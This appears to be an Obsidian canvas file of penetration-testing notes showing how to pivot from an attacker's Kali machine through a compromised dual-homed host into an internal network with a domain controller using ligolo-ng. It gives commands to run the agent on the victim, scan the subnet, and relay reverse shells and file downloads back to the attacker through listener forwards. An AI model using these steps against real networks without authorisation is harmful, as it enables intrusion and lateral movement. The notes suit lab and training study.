{
	"nodes":[
		{"type":"group","id":"1cafe9f25092c9be","x":-640,"y":-440,"width":1475,"height":780,"label":"Example"},
		{"type":"group","id":"e6bfbe935461cc41","x":-480,"y":760,"width":1435,"height":480,"label":"Step 7"},
		{"type":"group","id":"06a614b9bd914a78","x":98,"y":-1066,"width":1435,"height":480,"label":"Step 8"},
		{"type":"group","id":"b9b6d13b48fccfa1","x":-580,"y":-340,"width":700,"height":660,"color":"5","label":"External network"},
		{"type":"group","id":"cb0fd1a2070a7445","x":-220,"y":-180,"width":1035,"height":440,"color":"1","label":"Internal network"},
		{"type":"group","id":"eee2ee1ddafcd9c0","x":-1400,"y":760,"width":649,"height":460,"label":"Step 6"},
		{"type":"group","id":"f293051a549d6388","x":-1400,"y":-1160,"width":649,"height":440,"label":"Step 1"},
		{"type":"group","id":"5efbb6b4a9eb4eeb","x":-1400,"y":-640,"width":649,"height":400,"label":"Step 3"},
		{"type":"group","id":"8eb13b172d0c8f0e","x":-1400,"y":260,"width":649,"height":400,"label":"Step 5"},
		{"type":"group","id":"d2f095cc4a66f827","x":-1400,"y":-180,"width":649,"height":373,"label":"Step 4"},
		{"type":"group","id":"29216ce380b780b7","x":-640,"y":-1160,"width":680,"height":187,"label":"Step 2"},
		{"type":"text","text":"MS01\n\neth0: 192.168.85.136\neth1: 10.10.120.131","id":"e21248f98fd9bf14","x":-180,"y":-63,"width":250,"height":180},
		{"type":"text","text":"MS02\n\neth1: 10.10.120.130","id":"37be16fd91e16018","x":220,"y":-141,"width":250,"height":157},
		{"type":"text","text":"DC01\neth1: 10.10.120.140","id":"4a8ba529f42d1529","x":220,"y":93,"width":250,"height":127},
		{"type":"text","text":"ATTACKER - KALI\n\n192.168.85.128","id":"6e1b2ea5928a82f2","x":-520,"y":-39,"width":250,"height":133},
		{"type":"text","text":"Add interface to kali (use your own username)\n```\nsudo ip tuntap add user emvee mode tun ligolo\n```\nEnable interface\n```\nsudo ip link set ligolo up\n```\nStart ligolo-ng proxy\n```\n./proxy -selfcert\n```\n","id":"7b56a1d971b0665c","x":-1360,"y":-1140,"width":581,"height":380},
		{"type":"text","text":"In ligolo-ng proxy\n```\nsession\n```\nChoose session (1) and hit enter\n\nCheck network address\n```bash\nifconfig","id":"1cee0a69c18e18df","x":-1360,"y":-573,"width":581,"height":313},
		{"type":"text","text":"Open new terminal\n\n```\nsudo ip route add 10.10.120.0/24 dev ligolo\n```\nCheck to see if the new route is added\n```\nip route list\n```\n","id":"37203ac6a4fd9cac","x":-1360,"y":-139,"width":581,"height":293},
		{"type":"text","text":"In Ligolo-ng\n\nStart the tunnel for the session in ligolo-ng proxy\n```bash\nsession\n```\nselect session (1) hit enter and then start the tunnel\n```bash\nstart\n```\n","id":"3069a4e7257c5118","x":-1360,"y":300,"width":581,"height":320},
		{"type":"text","text":"Since everything is set we should test it. This could be done with crackmapexec. We scan the whole subnet on the internal interface.\n```bash\ncrackmapexec smb 10.10.120.0/24\n```\n\n```bash\nnmap --top-ports=1000 -sT -Pn 10.10.120.130 --open\n```","id":"4b0b382d78a8098b","x":-1360,"y":800,"width":581,"height":360},
		{"type":"text","text":"On the proxy server (ligolo-ng) setup a port forward from 1234 to our machine listening on 4444\n```bash\nlistener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444\n```\nShow listeners\n```bash\nlistener_list\n```\nSetup a listener\n```bash\nrlwrap nc -lvp 4444 \n```\n","id":"6f66398a9db9521f","x":-440,"y":800,"width":680,"height":400},
		{"type":"text","text":"IN THIS EXAMPLE:\nIf you want  a reverse shell from MS02 or DC01 to your attackker machine... \n* You need to use the IP address on eth1 on MS01. \n* The reverse shell should connect to the first port declared in the add listener. In this example port 1234.\n* The netcat listener should run on the second port specified. In this case 4444","id":"9d725433f9112c73","x":300,"y":800,"width":580,"height":400},
		{"type":"text","text":"On the proxy server (ligolo-ng) setup a port forward from 1234 to our machine listening on 4444\n```bash\nlistener_add --addr 0.0.0.0:1235 --to 127.0.0.1:80\n```\nShow listeners\n```bash\nlistener_list\n```\nStart a webserver\n```bash\nsudo python3 -m http.server 80\n```\n","id":"1ed33b13dc9875af","x":138,"y":-1043,"width":680,"height":400},
		{"type":"text","text":"IN THIS EXAMPLE:\nIf you want to download file to MS02 you could use the usual commands. But: \n* You need to use the IP address on eth1 on MS01. \n* The reverse shell should connect to the first port declared in the add listener. In this example port 1235.\n* The webserver is running on port 80","id":"a9b87a7153c90dcc","x":878,"y":-1043,"width":580,"height":400},
		{"type":"text","text":"On the victim\n```\nagent.exe -connect <IP-KALI>:11601 -ignore-cert \n```\n","id":"d76ba7f2cd276065","x":-600,"y":-1133,"width":581,"height":120}
	],
	"edges":[
		{"id":"d9a01ed8288a6b99","fromNode":"e21248f98fd9bf14","fromSide":"right","toNode":"37be16fd91e16018","toSide":"left","fromEnd":"arrow"},
		{"id":"d805cba7178b793c","fromNode":"e21248f98fd9bf14","fromSide":"right","toNode":"4a8ba529f42d1529","toSide":"left","fromEnd":"arrow"},
		{"id":"a7374d27ef247b41","fromNode":"6e1b2ea5928a82f2","fromSide":"right","toNode":"e21248f98fd9bf14","toSide":"left","fromEnd":"arrow"},
		{"id":"40496a2a29788f85","fromNode":"f293051a549d6388","fromSide":"right","toNode":"6e1b2ea5928a82f2","toSide":"left"},
		{"id":"5b73bd63ab005788","fromNode":"29216ce380b780b7","fromSide":"bottom","toNode":"e21248f98fd9bf14","toSide":"top"},
		{"id":"6b20a7b0504d6dc3","fromNode":"5efbb6b4a9eb4eeb","fromSide":"right","toNode":"6e1b2ea5928a82f2","toSide":"left"},
		{"id":"f8de03caeeef4e68","fromNode":"d2f095cc4a66f827","fromSide":"right","toNode":"6e1b2ea5928a82f2","toSide":"left"},
		{"id":"16abfddec2471f82","fromNode":"8eb13b172d0c8f0e","fromSide":"right","toNode":"6e1b2ea5928a82f2","toSide":"left"},
		{"id":"779a844e0cdb9d38","fromNode":"eee2ee1ddafcd9c0","fromSide":"right","toNode":"6e1b2ea5928a82f2","toSide":"bottom"},
		{"id":"6e3f464b7841b68c","fromNode":"e6bfbe935461cc41","fromSide":"top","toNode":"6e1b2ea5928a82f2","toSide":"bottom"},
		{"id":"bb5d39af7bceab25","fromNode":"e21248f98fd9bf14","fromSide":"bottom","toNode":"9d725433f9112c73","toSide":"top"},
		{"id":"46cf0b380200a77c","fromNode":"06a614b9bd914a78","fromSide":"left","toNode":"6e1b2ea5928a82f2","toSide":"top"},
		{"id":"0e9334e098450b42","fromNode":"e21248f98fd9bf14","fromSide":"top","toNode":"a9b87a7153c90dcc","toSide":"bottom"},
		{"id":"acd6b8cb586905f0","fromNode":"37be16fd91e16018","fromSide":"top","toNode":"a9b87a7153c90dcc","toSide":"bottom"}
	]
}